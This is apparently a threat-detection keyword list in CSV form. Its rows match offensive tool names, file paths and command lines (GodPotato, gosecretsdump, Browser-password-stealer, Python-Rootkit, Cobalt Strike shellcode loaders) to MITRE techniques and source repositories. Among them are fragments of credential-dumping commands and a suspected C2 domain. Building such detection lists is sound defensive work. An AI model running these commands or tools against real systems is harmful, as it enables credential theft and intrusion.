"*go-donut/*.go*",".{0,1000}go\-donut\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*GodPotato -*",".{0,1000}GodPotato\s\-.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*godpotato.cna*",".{0,1000}godpotato\.cna.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/weaselsec/GodPotato-Aggressor-Script","1","0","N/A","9","1","81","8","2024-01-02T00:22:03Z","2024-01-02T00:02:54Z" "*GodPotato.cs*",".{0,1000}GodPotato\.cs.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*godpotato.exe*",".{0,1000}godpotato\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*GodPotato.git*",".{0,1000}GodPotato\.git.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*GodPotato-Aggressor-Script*",".{0,1000}GodPotato\-Aggressor\-Script.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/weaselsec/GodPotato-Aggressor-Script","1","1","N/A","9","1","81","8","2024-01-02T00:22:03Z","2024-01-02T00:02:54Z" "*GodPotatoContext.cs*",".{0,1000}GodPotatoContext\.cs.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*GodPotato-master.zip*",".{0,1000}GodPotato\-master\.zip.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*GodPotato-NET*.exe*",".{0,1000}GodPotato\-NET.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*GodPotato-NET2.exe*",".{0,1000}GodPotato\-NET2\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*GodPotato-NET35.exe*",".{0,1000}GodPotato\-NET35\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*GodPotato-NET4.exe*",".{0,1000}GodPotato\-NET4\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*GodPotato-NET4.exe*",".{0,1000}GodPotato\-NET4\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/weaselsec/GodPotato-Aggressor-Script","1","1","N/A","10","1","81","8","2024-01-02T00:22:03Z","2024-01-02T00:02:54Z" "*GodPotatoUnmarshalTrigger.cs*",".{0,1000}GodPotatoUnmarshalTrigger\.cs.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*go-external-c2*",".{0,1000}go\-external\-c2.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*GoFetchAD/GoFetch*",".{0,1000}GoFetchAD\/GoFetch.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","620","139","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "*GoFetch-master*",".{0,1000}GoFetch\-master.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","620","139","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "*gohaleygoandhackawaythegibson*",".{0,1000}gohaleygoandhackawaythegibson.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*golang_c2-master*",".{0,1000}golang_c2\-master.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" "*golden_ticket.py*",".{0,1000}golden_ticket\.py.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*golden_ticket.rb*",".{0,1000}golden_ticket\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*goldencopy * --password * --stealth --krbtgt 060ee2d06c5648e60a9ed916c9221ad19d90e5fb7b1cccf9d51f540fe991ada1 *",".{0,1000}goldencopy\s.{0,1000}\s\-\-password\s.{0,1000}\s\-\-stealth\s\-\-krbtgt\s060ee2d06c5648e60a9ed916c9221ad19d90e5fb7b1cccf9d51f540fe991ada1\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*GoldenGMSA.exe*",".{0,1000}GoldenGMSA\.exe.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","7","2","123","21","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z" "*GoldenGMSA-main*",".{0,1000}GoldenGMSA\-main.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","7","2","123","21","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z" "*goldenPac.py*",".{0,1000}goldenPac\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*goMatrixC2.go*",".{0,1000}goMatrixC2\.go.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*goMatrixC2-main*",".{0,1000}goMatrixC2\-main.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*google-chrome/cookies.txt*",".{0,1000}google\-chrome\/cookies\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*google-chrome/credit_cards.txt*",".{0,1000}google\-chrome\/credit_cards\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*google-chrome/history.txt*",".{0,1000}google\-chrome\/history\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*google-chrome/login_data.txt*",".{0,1000}google\-chrome\/login_data\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*google-chrome\cookies.txt*",".{0,1000}google\-chrome\\cookies\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*google-chrome\credit_cards.txt*",".{0,1000}google\-chrome\\credit_cards\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*google-chrome\history.txt*",".{0,1000}google\-chrome\\history\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*google-chrome\login_data.txt*",".{0,1000}google\-chrome\\login_data\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*googlechromeauto.serveirc.com*",".{0,1000}googlechromeauto\.serveirc\.com.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*GoogleChromeAutoLaunch_9921366102WEAD21312ESAD31312*",".{0,1000}GoogleChromeAutoLaunch_9921366102WEAD21312ESAD31312.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","registry value","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*google-get-pdf-metadata *",".{0,1000}google\-get\-pdf\-metadata\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*google-get-rootdomains *",".{0,1000}google\-get\-rootdomains\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*goPassGen-master*",".{0,1000}goPassGen\-master.{0,1000}","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tools","https://github.com/bigb0sss/goPassGen","1","1","N/A","8","1","20","3","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z" "*gopherus --exploit mysql*",".{0,1000}gopherus\s\-\-exploit\smysql.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*gophish*phish.go*",".{0,1000}gophish.{0,1000}phish\.go.{0,1000}","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/gophish/gophish","1","1","N/A","N/A","10","10656","1973","2024-04-15T08:29:57Z","2013-11-18T23:26:43Z" "*gophish.go*",".{0,1000}gophish\.go.{0,1000}","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","10656","1973","2024-04-15T08:29:57Z","2013-11-18T23:26:43Z" "*gophish/gophish*",".{0,1000}gophish\/gophish.{0,1000}","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/gophish/gophish","1","1","N/A","N/A","10","10656","1973","2024-04-15T08:29:57Z","2013-11-18T23:26:43Z" "*gophish-send-mail.py*",".{0,1000}gophish\-send\-mail\.py.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2434","474","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*GoRelayServer.dll*",".{0,1000}GoRelayServer\.dll.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","495","78","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*gorsair -t *",".{0,1000}gorsair\s\-t\s.{0,1000}","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","0","N/A","N/A","9","837","74","2023-12-19T18:44:32Z","2018-08-02T16:49:14Z" "*go-secdump -*",".{0,1000}go\-secdump\s\-.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","3","279","31","2024-03-17T14:21:34Z","2023-02-23T17:02:50Z" "*go-secdump.exe*",".{0,1000}go\-secdump\.exe.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","3","279","31","2024-03-17T14:21:34Z","2023-02-23T17:02:50Z" "*go-secdump-main*",".{0,1000}go\-secdump\-main.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","3","279","31","2024-03-17T14:21:34Z","2023-02-23T17:02:50Z" "*gosecretsdump -ntds *-system *",".{0,1000}gosecretsdump\s\-ntds\s.{0,1000}\-system\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*gosecretsdump v* (@C__Sto*",".{0,1000}gosecretsdump\sv.{0,1000}\s\(\@C__Sto.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*gosecretsdump/cmd*",".{0,1000}gosecretsdump\/cmd.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*gosecretsdump_win*.exe*",".{0,1000}gosecretsdump_win.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*gosecure/pyrdp*",".{0,1000}gosecure\/pyrdp.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*GoSecure/pyrdp*",".{0,1000}GoSecure\/pyrdp.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*go-shellcode.py*",".{0,1000}go\-shellcode\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" 